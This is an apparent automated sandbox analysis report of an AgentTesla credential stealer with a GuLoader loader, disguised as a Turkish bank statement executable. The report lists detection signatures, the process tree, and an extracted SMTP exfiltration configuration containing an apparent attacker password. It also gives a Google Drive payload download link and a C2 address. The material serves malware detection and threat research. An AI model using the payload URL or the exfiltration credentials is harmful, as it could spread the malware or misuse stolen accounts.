Loading ...

Play interactive tourEdit tour

Windows Analysis Report Hesap Hareketleri 28-09-2021.exe

Overview

General Information

Sample Name:Hesap Hareketleri 28-09-2021.exe
Analysis ID:1379
MD5:2fca7a3e51417ee2e8aefafede0847d9
SHA1:931518250bed6cd21b6cab529ed3ad9ead83cdcf
SHA256:bffbffc2b1be154742fb81ecea14cb779b8fd81581ffce2855cf588f21a8020f
Infos:

Most interesting Screenshot:

Detection

AgentTesla GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected AgentTesla
Antivirus / Scanner detection for submitted sample
Sigma detected: RegAsm connects to smtp port
Yara detected GuLoader
Hides threads from debuggers
Writes to foreign memory regions
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to detect Any.run
Tries to harvest and steal ftp login credentials
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to steal Mail credentials (via file access)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to harvest and steal browser information (history, passwords, etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Yara detected Credential Stealer
JA3 SSL client fingerprint seen in connection with other malware
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
PE file contains an invalid checksum
PE file contains strange resources
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Detected TCP or UDP traffic on non-standard ports
Checks if the current process is being debugged
Uses SMTP (mail sending)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Uses Microsoft's Enhanced Cryptographic Provider
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64native
  • Hesap Hareketleri 28-09-2021.exe (PID: 4208 cmdline: 'C:\Users\user\Desktop\Hesap Hareketleri 28-09-2021.exe' MD5: 2FCA7A3E51417EE2E8AEFAFEDE0847D9)
    • RegAsm.exe (PID: 388 cmdline: 'C:\Users\user\Desktop\Hesap Hareketleri 28-09-2021.exe' MD5: 0D5DF43AF2916F47D00C1573797C1A13)
      • conhost.exe (PID: 396 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
  • cleanup

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "SMTP Info": "jaen@brimaq.combrimaQ2012mail.brimaq.comforceconnor36@gmail.com"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000006.00000002.116546085620.000000001D611000.00000004.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
    00000006.00000002.116546085620.000000001D611000.00000004.00000001.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000002.00000002.111975137520.00000000023A0000.00000040.00000001.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
        Process Memory Space: RegAsm.exe PID: 388JoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
          Process Memory Space: RegAsm.exe PID: 388JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security

            Sigma Overview

            Networking:

            barindex
            Sigma detected: RegAsm connects to smtp portShow sources
            Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 78.128.8.31, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, Initiated: true, ProcessId: 388, Protocol: tcp, SourceIp: 192.168.11.20, SourceIsIpv6: false, SourcePort: 49832

            Jbx Signature Overview

            Click to jump to signature section

            Show All Signature Results

            AV Detection:

            barindex
            Found malware configurationShow sources
            Source: RegAsm.exe.388.6.memstrminMalware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "SMTP Info": "jaen@brimaq.combrimaQ2012mail.brimaq.comforceconnor36@gmail.com"}
            Multi AV Scanner detection for submitted fileShow sources
            Source: Hesap Hareketleri 28-09-2021.exeReversingLabs: Detection: 26%
            Antivirus / Scanner detection for submitted sampleShow sources
            Source: Hesap Hareketleri 28-09-2021.exeAvira: detected
            Source: 2.0.Hesap Hareketleri 28-09-2021.exe.400000.0.unpackAvira: Label: TR/Injector.lnjwp
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_1C472330 CryptUnprotectData,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_1C472A69 CryptUnprotectData,
            Source: Hesap Hareketleri 28-09-2021.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
            Source: unknownHTTPS traffic detected: 216.58.212.174:443 -> 192.168.11.20:49797 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 216.58.212.161:443 -> 192.168.11.20:49798 version: TLS 1.2

            Networking:

            barindex
            Source: Joe Sandbox ViewASN Name: TELEPOINTBG TELEPOINTBG
            Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
            Source: Joe Sandbox ViewIP Address: 78.128.8.31 78.128.8.31
            Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1R606ThBbUXrI8jJ5HXdyvI0FaWypamM9 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/ubgela7liasrjha8jdur2ta6pltlarcg/1632809700000/00519186742208262786/*/1R606ThBbUXrI8jJ5HXdyvI0FaWypamM9?e=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheHost: doc-0o-50-docs.googleusercontent.comConnection: Keep-Alive
            Source: global trafficTCP traffic: 192.168.11.20:49832 -> 78.128.8.31:587
            Source: global trafficTCP traffic: 192.168.11.20:49832 -> 78.128.8.31:587
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49798
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49797
            Source: unknownNetwork traffic detected: HTTP traffic on port 49797 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 443
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: RegAsm.exe, 00000006.00000002.116546085620.000000001D611000.00000004.00000001.sdmpString found in binary or memory: http://127.0.0.1:HTTP/1.1
            Source: RegAsm.exe, 00000006.00000002.116547448568.000000001D732000.00000004.00000001.sdmp, RegAsm.exe, 00000006.00000003.112858930394.00000000009D1000.00000004.00000001.sdmpString found in binary or memory: http://12jxJNEdrHvv9foosbQ.com
            Source: RegAsm.exe, 00000006.00000002.116546085620.000000001D611000.00000004.00000001.sdmpString found in binary or memory: http://DynDns.comDynDNS
            Source: RegAsm.exe, 00000006.00000002.116553077151.000000001F85D000.00000004.00000001.sdmpString found in binary or memory: http://apps.identrust.com/roots/dstrootcax3.p7c0
            Source: RegAsm.exe, 00000006.00000002.116535332684.000000000073C000.00000004.00000020.sdmpString found in binary or memory: http://cps.letsencrypt.org0
            Source: RegAsm.exe, 00000006.00000002.116553077151.000000001F85D000.00000004.00000001.sdmpString found in binary or memory: http://cps.root-x1.letsencrypt.org0
            Source: RegAsm.exe, 00000006.00000003.111947575921.0000000000791000.00000004.00000001.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
            Source: RegAsm.exe, 00000006.00000003.111947575921.0000000000791000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
            Source: RegAsm.exe, 00000006.00000002.116553077151.000000001F85D000.00000004.00000001.sdmpString found in binary or memory: http://crl.identrust.com/DSTROOTCAX3CRL.crl0
            Source: RegAsm.exe, 00000006.00000002.116547302191.000000001D70E000.00000004.00000001.sdmpString found in binary or memory: http://mail.brimaq.com
            Source: RegAsm.exe, 00000006.00000002.116535332684.000000000073C000.00000004.00000020.sdmpString found in binary or memory: http://r3.i.lencr.org/0#
            Source: RegAsm.exe, 00000006.00000002.116535332684.000000000073C000.00000004.00000020.sdmpString found in binary or memory: http://r3.o.lencr.org0
            Source: RegAsm.exe, 00000006.00000002.116535332684.000000000073C000.00000004.00000020.sdmpString found in binary or memory: http://x1.c.lencr.org/0
            Source: RegAsm.exe, 00000006.00000002.116535332684.000000000073C000.00000004.00000020.sdmpString found in binary or memory: http://x1.i.lencr.org/0
            Source: RegAsm.exe, 00000006.00000002.116546085620.000000001D611000.00000004.00000001.sdmpString found in binary or memory: http://xIzTkA.com
            Source: RegAsm.exe, 00000006.00000003.111947575921.0000000000791000.00000004.00000001.sdmpString found in binary or memory: https://csp.withgoogle.com/csp/drive-explorer/
            Source: RegAsm.exe, 00000006.00000003.111947575921.0000000000791000.00000004.00000001.sdmp, RegAsm.exe, 00000006.00000002.116535332684.000000000073C000.00000004.00000020.sdmpString found in binary or memory: https://doc-0o-50-docs.googleusercontent.com/
            Source: RegAsm.exe, 00000006.00000002.116535332684.000000000073C000.00000004.00000020.sdmpString found in binary or memory: https://doc-0o-50-docs.googleusercontent.com/W
            Source: RegAsm.exe, 00000006.00000003.111947575921.0000000000791000.00000004.00000001.sdmpString found in binary or memory: https://doc-0o-50-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/ubgela7l
            Source: RegAsm.exe, 00000006.00000002.116534991391.00000000006FA000.00000004.00000020.sdmpString found in binary or memory: https://drive.google.com/
            Source: RegAsm.exe, 00000006.00000002.116534991391.00000000006FA000.00000004.00000020.sdmpString found in binary or memory: https://drive.google.com/&
            Source: RegAsm.exe, 00000006.00000002.116536424340.0000000000800000.00000004.00000001.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1R606ThBbUXrI8jJ5HXdyvI0FaWypamM9
            Source: RegAsm.exe, 00000006.00000003.111947436454.0000000000781000.00000004.00000001.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1R606ThBbUXrI8jJ5HXdyvI0FaWypamM9I7ylOrutae-R8jtjc
            Source: RegAsm.exe, 00000006.00000002.116534991391.00000000006FA000.00000004.00000020.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1R606ThBbUXrI8jJ5HXdyvI0FaWypamM9S
            Source: RegAsm.exe, 00000006.00000002.116536424340.0000000000800000.00000004.00000001.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1R606ThBbUXrI8jJ5HXdyvI0FaWypamM9wininet.dllMozilla/5
            Source: RegAsm.exe, 00000006.00000002.116546745972.000000001D69E000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/
            Source: RegAsm.exe, 00000006.00000002.116546564036.000000001D67C000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com//
            Source: RegAsm.exe, 00000006.00000002.116546564036.000000001D67C000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/https://login.live.com/
            Source: RegAsm.exe, 00000006.00000002.116546564036.000000001D67C000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/v104
            Source: RegAsm.exe, 00000006.00000002.116546745972.000000001D69E000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
            Source: RegAsm.exe, 00000006.00000002.116546085620.000000001D611000.00000004.00000001.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha
            Source: unknownDNS traffic detected: queries for: drive.google.com
            Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1R606ThBbUXrI8jJ5HXdyvI0FaWypamM9 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/ubgela7liasrjha8jdur2ta6pltlarcg/1632809700000/00519186742208262786/*/1R606ThBbUXrI8jJ5HXdyvI0FaWypamM9?e=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheHost: doc-0o-50-docs.googleusercontent.comConnection: Keep-Alive
            Source: unknownHTTPS traffic detected: 216.58.212.174:443 -> 192.168.11.20:49797 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 216.58.212.161:443 -> 192.168.11.20:49798 version: TLS 1.2
            Source: Hesap Hareketleri 28-09-2021.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_00111130
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_00113A50
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0011BA70
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_00114320
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0011F778
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0011C7D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_00113708
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_00170040
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_00176868
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_00171300
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0056C250
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0056C281
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_009778C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0097EC28
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_00975810
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_00978E88
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_00973330
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_009A09D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_009A8040
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_009AA338
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_009A5518
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_1C47E008
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_1C479CBB
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_1C47617E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_1C47ED78
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_1C47A108
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_1C470040
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_1C470006
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_1D475E08
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_1D474ACC
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_1D475E07
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_1D476AFD
            Source: Hesap Hareketleri 28-09-2021.exe, 00000002.00000000.111482265142.0000000000415000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameTOBENET.exe vs Hesap Hareketleri 28-09-2021.exe
            Source: Hesap Hareketleri 28-09-2021.exeBinary or memory string: OriginalFilenameTOBENET.exe vs Hesap Hareketleri 28-09-2021.exe
            Source: Hesap Hareketleri 28-09-2021.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: C:\Users\user\Desktop\Hesap Hareketleri 28-09-2021.exeSection loaded: edgegdi.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: edgegdi.dll
            Source: Hesap Hareketleri 28-09-2021.exeReversingLabs: Detection: 26%
            Source: Hesap Hareketleri 28-09-2021.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\Hesap Hareketleri 28-09-2021.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: C:\Users\user\Desktop\Hesap Hareketleri 28-09-2021.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dll
            Source: unknownProcess created: C:\Users\user\Desktop\Hesap Hareketleri 28-09-2021.exe 'C:\Users\user\Desktop\Hesap Hareketleri 28-09-2021.exe'
            Source: C:\Users\user\Desktop\Hesap Hareketleri 28-09-2021.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe 'C:\Users\user\Desktop\Hesap Hareketleri 28-09-2021.exe'
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Hesap Hareketleri 28-09-2021.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe 'C:\Users\user\Desktop\Hesap Hareketleri 28-09-2021.exe'
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
            Source: C:\Users\user\Desktop\Hesap Hareketleri 28-09-2021.exeFile created: C:\Users\user\AppData\Local\Temp\~DF02F88E35E6118152.TMPJump to behavior
            Source: classification engineClassification label: mal100.spre.troj.spyw.evad.winEXE@4/1@3/3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\e4a1c9189d2b01f018b953e46c80d120\mscorlib.ni.dll
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:396:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:396:304:WilStaging_02
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

            Data Obfuscation:

            barindex
            Yara detected GuLoaderShow sources
            Source: Yara matchFile source: 00000002.00000002.111975137520.00000000023A0000.00000040.00000001.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\Hesap Hareketleri 28-09-2021.exeCode function: 2_2_00402AE8 push es; ret
            Source: C:\Users\user\Desktop\Hesap Hareketleri 28-09-2021.exeCode function: 2_2_004064F7 push 13C55635h; retf
            Source: C:\Users\user\Desktop\Hesap Hareketleri 28-09-2021.exeCode function: 2_2_0040431A pushfd ; retf
            Source: C:\Users\user\Desktop\Hesap Hareketleri 28-09-2021.exeCode function: 2_2_023A4238 push 00000054h; retf
            Source: C:\Users\user\Desktop\Hesap Hareketleri 28-09-2021.exeCode function: 2_2_023A3807 pushfd ; iretd
            Source: C:\Users\user\Desktop\Hesap Hareketleri 28-09-2021.exeCode function: 2_2_023A3E7B push ebp; ret
            Source: C:\Users\user\Desktop\Hesap Hareketleri 28-09-2021.exeCode function: 2_2_023A106F push ecx; ret
            Source: C:\Users\user\Desktop\Hesap Hareketleri 28-09-2021.exeCode function: 2_2_023A10D6 push ecx; ret
            Source: C:\Users\user\Desktop\Hesap Hareketleri 28-09-2021.exeCode function: 2_2_023A5533 push ebp; iretd
            Source: C:\Users\user\Desktop\Hesap Hareketleri 28-09-2021.exeCode function: 2_2_023A111A push ecx; ret
            Source: C:\Users\user\Desktop\Hesap Hareketleri 28-09-2021.exeCode function: 2_2_023A5563 push ebp; iretd
            Source: C:\Users\user\Desktop\Hesap Hareketleri 28-09-2021.exeCode function: 2_2_023A318B push 8E2D3A7Eh; iretd
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_00972177 push edi; retn 0000h
            Source: Hesap Hareketleri 28-09-2021.exeStatic PE information: real checksum: 0x24c6f should be: 0x20bce
            Source: C:\Users\user\Desktop\Hesap Hareketleri 28-09-2021.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Hesap Hareketleri 28-09-2021.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Hesap Hareketleri 28-09-2021.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Hesap Hareketleri 28-09-2021.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Hesap Hareketleri 28-09-2021.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
